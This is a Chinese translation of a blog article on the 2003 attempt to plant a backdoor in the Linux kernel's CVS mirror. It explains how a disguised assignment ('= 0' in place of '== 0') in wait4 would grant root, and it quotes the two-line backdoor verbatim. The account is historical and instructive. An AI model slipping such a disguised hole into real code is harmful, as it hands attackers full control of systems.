乔希最近写了一篇关于 2006 年在 Debian Linux 中出现的一个严重安全漏洞的文章,以及它是否真的是由美国国家安全局插入的后门。(他的结论是很可能不是)。
今天我要写的是 2003 年发生的另一起事件,当时有人试图在 Linux 内核中植入后门。这一次肯定是有人试图插入后门。但我们不知道是谁做了这样的尝试,也许永远也不会知道。
早在2003年,Linux就使用了一个名为BitKeeper的系统来存储Linux源代码的主拷贝。如果开发人员想对 Linux 代码提出修改意见,他们可以提交修改建议,然后通过一个有组织的审批流程来决定是否将修改意见纳入主代码。对主代码的每一次修改都会有一个简短的解释,其中总是包括一个指向批准记录的指针。
但有些人并不喜欢 BitKeeper,因此我们保留了第二份源代码副本,这样开发人员就可以通过另一个名为 CVS 的代码系统获取代码。CVS 代码副本是 BitKeeper 主副本的直接克隆。
但在 2003 年 11 月 5 日,Larry McVoy 发现 CVS 副本中有一处代码变更没有指向批准记录。调查显示,该修改从未被批准过,更奇怪的是,该修改根本没有出现在主 BitKeeper 代码库中。进一步调查发现,显然有人(通过电子方式)侵入了 CVS 服务器并插入了这一变更。
这个改动做了什么?这才是真正有趣的地方。这次修改修改了一个名为 wait4 的 Linux 函数的代码,程序可以用它来等待某些事情的发生。具体来说,它添加了这两行代码:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
[为了解 C 编程语言的读者提供的参考:这段代码有什么不同寻常之处?答案如下]。
如果专家随便读一下,就会把它理解为无伤大雅的错误检查代码,当以文档禁止的某种方式调用 wait4 时,它会让 wait4 返回错误代码。但真正细心的专家读者会注意到,在第一行的末尾,写的是”= 0 “而不是”== 0″。在这样的代码中,正常的写法是”== 0″,即测试当前运行代码(current->uid)的用户 ID 是否等于零,而不修改用户 ID。但实际出现的是”=0″,其效果是将用户 ID 设置为 0。
将用户 ID 设置为零是个问题,因为用户 ID 为零的用户就是 “root “用户,它可以做任何它想做的事–访问所有数据、改变所有代码的行为,以及完全破坏系统所有部分的安全性。因此,这段代码的作用就是给任何以特定方式调用 wait4 的软件以 root 权限,而这种方式本应是无效的。换句话说……这是一个典型的后门。
这是一个非常聪明的程序。它看起来像是无害的错误检查,但实际上却是一个后门。它是在正常审批程序之外被植入代码中的,目的是避免审批程序发现其中的蹊跷。
但这一尝试并没有成功,因为 Linux 团队足够谨慎,他们注意到 CVS 代码库中的这些代码没有经过正常的审批流程。Linux 得一分。
这可能是美国国家安全局的攻击吗?有可能。但还有很多人拥有实施这次攻击的技能和动机。除非有人招供,或者有证据证明,否则我们永远不会知道。
本文文字及图片出自 The Linux Backdoor Attempt of 2003
你的反应是: